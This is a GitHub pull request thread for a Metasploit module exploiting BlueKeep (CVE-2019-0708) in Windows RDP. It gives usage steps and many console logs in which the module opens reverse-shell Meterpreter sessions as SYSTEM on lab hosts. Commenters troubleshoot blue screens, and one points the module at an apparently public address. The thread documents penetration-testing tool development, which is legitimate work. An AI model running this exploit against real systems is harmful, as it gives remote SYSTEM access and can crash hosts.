Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add initial exploit for CVE-2019-0708, BlueKeep #12283

Merged
merged 53 commits into from Sep 23, 2019

Conversation

@bcook-r7
Copy link
Contributor

commented Sep 6, 2019

This PR adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

This module was originally developed by @zerosum0x0 and @ryhanson, then further moved along by @OJ, @zeroSteiner, @rickoates, @wvu-r7, @bwatters-r7, @wchen-r7, @tsellers-r7, @todb-r7 and others. The module was ported from a Python external module to a native Ruby module in order to take advantage of the RDP and other library enhancements in Metasploit. The original Python module is in the commit history if you wish to examine and compare it the the current implementation.

The module currently targets 64-bit versions of Windows 7 and Windows Server 2008 R2. For Windows Server 2008 R2, a registry entry needs to be modified to enable heap grooming via the RDPSND channel, though there remain other possibilities to explore for using alternate channels that are enabled by default on all Windows OSes.

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

There are specific targets for bare-metal, Virtualbox, VMware, and Hyper-V, though there may be additional variables in your target environment that additionally shift the base address for grooming, so we welcome any ideas from the community for automatically detecting this instead!

Todo

  • Fix error handling when licensing is incorrect

Optional Todo

  • Handle low-bandwidth networks more gracefully
  • Add detection for whether RDPSND channel-based grooming will work
  • Detect more OS specifics / obtain memory leak to determine Windows NPP start address
  • Write the XP/2003 portions grooming MS_T120.
  • Expand channels besides RDPSND/MS_T120 for grooming.

Verification

  • Start msfconsole
  • use exploit/rdp/cve_2019_0708_bluekeep_rce
  • set RHOSTS to target hosts (x64 Windows 7 or 2008 R2)
  • set PAYLOAD and associated options as desired
  • set TARGET to a more specific target based on your environment
  • Verify that you get a shell
  • Verify the target does not crash

Exploitation Sample Output

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.101:3389 - Surfing channels ...
[*] 192.168.56.101:3389 - Lobbing eggs ...
[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500
[*] Session 1 created in the background.
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.105:3389 - Surfing channels ...
[*] 192.168.56.105:3389 - Lobbing eggs ...
[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500
[*] Session 2 created in the background.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BCOOK-PC         192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-VVEKS0PTPFB  192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Sep 6, 2019

To test, ensure you've copied all four .rb files from this PR, then restart msfconsole.

This PR includes changes to the core RDP library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

  • lib/msf/core/exploit/rdp.rb
  • modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  • modules/auxiliary/scanner/rdp/rdp_scanner.rb
  • modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Sep 6, 2019

I've tried this on Windows 2008 R2 Enterprise (x64) (2GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

Exploit failed, but the host didn't crash either.

Edit: Looks like it failed at the license packet step. Which makes sense, as the service was configured with no license, within the 120 day license grace period.

  • NLA disabled
  • HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Cannot reliably check exploitability.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Verifying RDP protocol...
[*] 172.16.191.198:3389 - Attempting to connect using TLS security
[*] 172.16.191.198:3389 - Sending erect domain request
[*] 172.16.191.198:3389 - Sending client info PDU
[*] 172.16.191.198:3389 - Received License packet
[*] 172.16.191.198:3389 - Sending client confirm active PDU
[*] 172.16.191.198:3389 - Sending client synchronize PDU
[*] 172.16.191.198:3389 - Sending client control cooperate PDU
[*] 172.16.191.198:3389 - Sending client control request control PDU
[-] 172.16.191.198:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

Windows 7 SP 1 Professional (x64) (4GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

  • set target 1 - fail. no shell. blue screen after repeated attempts.
  • set target 3 - always blue screen (SYSTEM_SERVICE_EXCEPTION, termdd.sys PAGE_FAULT_IN_NONPAGED_AREA)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[+] 172.16.191.130:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[*] 172.16.191.130:3389 - Verifying RDP protocol...
[*] 172.16.191.130:3389 - Attempting to connect using TLS security
[*] 172.16.191.130:3389 - Sending erect domain request
[*] 172.16.191.130:3389 - Sending client info PDU
[*] 172.16.191.130:3389 - Received License packet
[*] 172.16.191.130:3389 - Waiting for Server Demand packet
[*] 172.16.191.130:3389 - Received Server Demand packet
[*] 172.16.191.130:3389 - Sending client confirm active PDU
[*] 172.16.191.130:3389 - Sending client synchronize PDU
[*] 172.16.191.130:3389 - Sending client control cooperate PDU
[*] 172.16.191.130:3389 - Sending client control request control PDU
[*] 172.16.191.130:3389 - Sending client input sychronize PDU
[*] 172.16.191.130:3389 - Sending client font list PDU
[*] 172.16.191.130:3389 - Handling SERVER ANNOUNCE ...
[*] 172.16.191.130:3389 - Handling SERVER CAPABILITY ...
[*] 172.16.191.130:3389 - Handling CLIENT ID CONFIRM ...
[*] 172.16.191.130:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 172.16.191.130:3389 - Creating free trigger for user 13 on channel 1013
[*] 172.16.191.130:3389 - Surfing channels ...
[*] 172.16.191.130:3389 - Lobbing eggs ...
[*] 172.16.191.130:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 
@busterb busterb force-pushed the busterb:bluekeep branch from 7f194eb to edb7e20 Sep 6, 2019
@busterb

This comment has been minimized.

Copy link
Member

commented Sep 6, 2019

Thanks @bcoles will take a look at the VMware target. We may be a bit over-broad in which VMWare product we're specifying there, though of course it would be nice to not need these specific targets at the risk of having a combinatorial target explosion.

@rockstardev

This comment has been minimized.

Copy link

commented Sep 6, 2019

Godspeed my friends... let's hope enough people patch their systems before pwning starts.

@zerosum0x0

This comment has been minimized.

Copy link
Contributor

commented Sep 6, 2019

@bcoles the different targets mostly have to do with hot-swap memory. When it's enabled, the NT kernel must allocate more PFN table PTE metadata structures before the actual start of the NPP.

If hot-swap memory is disabled (nominal) I would expect the default target to work. A full kernel crash dump is required for analysis though, the minidumps don't carry enough info forward.

@Zn00k

This comment has been minimized.

Copy link

commented Sep 6, 2019

[*] Started reverse TCP handler on 192.168.146.128:4444 
[+] IP:3389  - The target is vulnerable.
[-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect for #<Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60>
Did you mean?  disconnect
[*] Exploit completed, but no session was created.

@422926799

This comment has been minimized.

Copy link

commented Sep 6, 2019

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

@kevthehermit

This comment has been minimized.

Copy link

commented Sep 7, 2019

What is the easiest way to identify the Groombase for other targets - Looking at a Server 2008 R2 on AWS (Uploaded a vulnerable image that had been tested locally with VMware)

@MartinIngesen

This comment has been minimized.

Copy link

commented Sep 7, 2019

[*] Started reverse TCP handler on 192.168.146.128:4444 [+] IP:3389 - The target is vulnerable. [-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect' for #Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60
Did you mean? disconnect
[*] Exploit completed, but no session was created.
`

There were changes made to the core rdp library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

@xkkhh

This comment was marked as off-topic.

Copy link

commented Sep 7, 2019

70周年前发毛?国内的看这里:http://blog.xkkhh.cn/archives/535

@DoktorCranium

This comment has been minimized.

Copy link

commented Sep 7, 2019

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

[] Started reverse TCP handler on 192.168.11.9:4444
[
] 10.0.2.21:3389 - Detected RDP on 10.0.2.21:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 10.0.2.21:3389 - The target is vulnerable.
[] 10.0.2.21:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[
] 10.0.2.21:3389 - Surfing channels ...
[] 10.0.2.21:3389 - Lobbing eggs ...
[
] 10.0.2.21:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

Id Name


0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

@jack-99

This comment has been minimized.

Copy link

commented Sep 7, 2019

为什么我更新了msf,也没有找到这个利用模块

@MartinIngesen

This comment has been minimized.

Copy link

commented Sep 7, 2019

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

@422926799

This comment has been minimized.

Copy link

commented Sep 7, 2019

为什么我更新了无国界医生,也没有找到这个利用模块

得自己导入4个rb

@linuxluyi

This comment has been minimized.

Copy link

commented Sep 7, 2019

70周年前发毛?国内的看这里:http://blog.xkkhh.cn/archives/535

大佬有没有找个物理机试试,如果不修改注册表的话是不是就没法复现了。

@jack-99

This comment has been minimized.

Copy link

commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /

rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

@422926799

This comment has been minimized.

Copy link

commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

@jack-99

This comment has been minimized.

Copy link

commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

@422926799

This comment has been minimized.

Copy link

commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

黑人问号

@jack-99

This comment has been minimized.

Copy link

commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

黑人问号

我攻击的目标是win7 啊,win7不也受影响么,但是每次攻击都会蓝屏

@422926799

This comment has been minimized.

Copy link

commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

黑人问号

我攻击的目标是win7 啊,win7不也受影响么,但是每次攻击都会蓝屏

我这边也有朋友有这个问题,好像是target的问题

@hahadaxia

This comment was marked as off-topic.

Copy link

commented Sep 7, 2019

@evil0xxx

This comment was marked as resolved.

Copy link

commented Sep 7, 2019

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description


RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)

Exploit target:

Id Name


0 Automatic targeting via fingerprinting

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.50.5
rhosts => 192.168.50.5
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 192.168.50.5:3389 - Detected RDP on 192.168.50.5:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.50.5:3389 - The target is vulnerable.
[+] 192.168.50.5:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[] Started reverse TCP handler on 192.168.50.73:4444
[
] 192.168.50.5:3389 - Detected RDP on 192.168.50.5:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.50.5:3389 - The target is vulnerable.
[-] 192.168.50.5:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.

@busterb

This comment has been minimized.

Copy link
Member

commented Sep 7, 2019

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

Thanks for the note @MartinIngesen I was able to reproduce @bcoles crash above with VMWare Fusion 11.

@busterb

This comment has been minimized.

Copy link
Member

commented Sep 7, 2019

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

@DoktorCranium VirtualBox 6.0.10 on Linux and Mac.

@adeljck

This comment has been minimized.

Copy link

commented Sep 7, 2019

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description


RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)

Exploit target:

Id Name


0 Automatic targeting via fingerprinting

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 154.8.170.33
rhosts => 154.8.170.33
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[] Started reverse TCP handler on 192.168.1.3:4444
[
] 154.8.170.33:3389 - Cannot reliably check exploitability.
[-] 154.8.170.33:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.

give some help

@Ghost-Assassin

This comment was marked as off-topic.

Copy link

commented Sep 7, 2019

image

Kali 2019.3 Latest MSF5 from apt
If the following file replaces the original file then reload_all, this error will occur.
cve_2019_0708_bluekeep.rb

@busterb

This comment has been minimized.

Copy link
Member

commented Sep 23, 2019

Landing this module now, further improvements will come in new PRs. Thanks everyone for testing and notes!

bcook-r7 pushed a commit that referenced this pull request Sep 23, 2019
@bcook-r7 bcook-r7 merged commit c0be631 into rapid7:master Sep 23, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Sep 23, 2019
@cbwang505

This comment has been minimized.

@brandenjlynch

This comment has been minimized.

Copy link

commented Sep 27, 2019

I keep seeing this error: "Exploit failed: NameError uninitialized constant OpenSSL::SSL::TLS1_VERSION"

As far as I can tell all the code is up to date, just pulled it down via git. Any thoughts? OpenSSL should already be required, so..

@zeroSteiner

This comment has been minimized.

Copy link
Member

commented Sep 27, 2019

@brandenjlynch I'd run into the same error. It was an issue with my environment, IIRC the OpenSSL gem hadn't installed correctly. I would suggest you verify your version of ruby is correct and then reinstall that gem. I believe it tries to compile from source so make sure you have the development headers available.

@brandenjlynch

This comment has been minimized.

Copy link

commented Sep 27, 2019

@zeroSteiner Thanks I'll try that!

@robertgov

This comment has been minimized.

Copy link

commented Sep 27, 2019

Has anyone succeeded with a physical machine? The vmware unpached win 7 worked with a little groomsize tweaqking but can't even get to a 'bluescreen' on my other laptop in a lab test.

@busterb

This comment has been minimized.

Copy link
Member

commented Sep 30, 2019

Release Notes

This adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

@tperry-r7 tperry-r7 added rn-modules and removed rn-modules labels Oct 1, 2019
@tdoan-r7 tdoan-r7 added hotness and removed docs hotness labels Oct 1, 2019
@terabytexr3

This comment has been minimized.

Copy link

commented Oct 5, 2019

When i try in Kali many problem, almost GROOMSIZE and Target.
But i try windows version its good. Its very easy.
https://youtu.be/SCsJ9Uq3POk

@qiushui-sir

This comment has been minimized.

Copy link

commented Oct 9, 2019

When I tested, I always had the following questions
[*] Started reverse TCP handler on 192.168.1.119:4444 [*] 192.168.1.120:3389 - Detected RDP on 192.168.1.120:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.1.120:3389 - The target is vulnerable. [*] 192.168.1.120:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.1.120:3389 - Surfing channels ... [*] 192.168.1.120:3389 - Lobbing eggs ... [-] 192.168.1.120:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.
I set goals, target and RHOST
My steps are the same as others, and even I have re-installed the system and Vmware several times.
What's wrong with me? What's wrong with me?

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2019

Nothing is wrong with you.

@qiushui-sir

This comment has been minimized.

Copy link

commented Oct 9, 2019

你没事。

What should I do to restore success?
Thank you.

@qiushui-sir

This comment has been minimized.

Copy link

commented Oct 9, 2019

I just tried 2008 again, the same question.
[*] Started reverse TCP handler on 192.168.1.119:4444 [*] 192.168.1.122:3389 - Detected RDP on 192.168.1.122:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.1.122:3389 - The target is vulnerable. [*] 192.168.1.122:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.1.122:3389 - Surfing channels ... [*] 192.168.1.122:3389 - Lobbing eggs ... [-] 192.168.1.122:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2019

What target did you select?

@qiushui-sir

This comment has been minimized.

Copy link

commented Oct 10, 2019

您选择了什么目标?

I chose VMware, version 15.1.0.

@amagrupp

This comment has been minimized.

Copy link

commented Oct 11, 2019

Не знаю что было изменено, но в virtual box эксплойт отрабатывает, но не создаёт сессию, не выполняет exeс, ничего.

В чем дело ?

@amagrupp

This comment has been minimized.

Copy link

commented Oct 11, 2019

I don’t know what has been changed, but in the virtual box, the exploit works, but does not create a session, does not execute exec, nothing.

What's the matter ?

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Oct 11, 2019

First of all, everyone needs to provide more details. Logs, screenshots, anything. Information about your setup. Version numbers. WinDbg sessions if you have to. The exploit's success is highly dependent on memory layout, specifically NPP base. It is impossible to provide support for this module without details. This is bug reporting 101.

